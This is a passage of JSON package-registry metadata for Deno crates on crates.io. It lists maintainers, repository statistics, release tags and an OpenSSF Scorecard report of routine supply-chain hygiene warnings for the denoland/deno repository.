ucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-06-12T13:02:31.796Z","updated_at":"2025-06-12T13:02:31.796Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-06-12T13:02:32.105Z","updated_at":"2025-06-12T13:02:32.105Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4046936,"name":"deno_bench_util","ecosystem":"cargo","description":"Bench and profiling utilities for deno crates","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":250,"first_release_published_at":"2021-05-20T14:47:30.859Z","latest_release_published_at":"2026-08-06T11:45:29.329Z","latest_release_number":"0.251.0","last_synced_at":"2026-08-29T21:57:06.212Z","created_at":"2022-04-12T09:57:31.857Z","updated_at":"2026-08-29T21:57:06.213Z","registry_url":"https://crates.io/crates/deno_bench_util/","install_command":"cargo install deno_bench_util","documentation_url":"https://docs.rs/deno_bench_util/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha"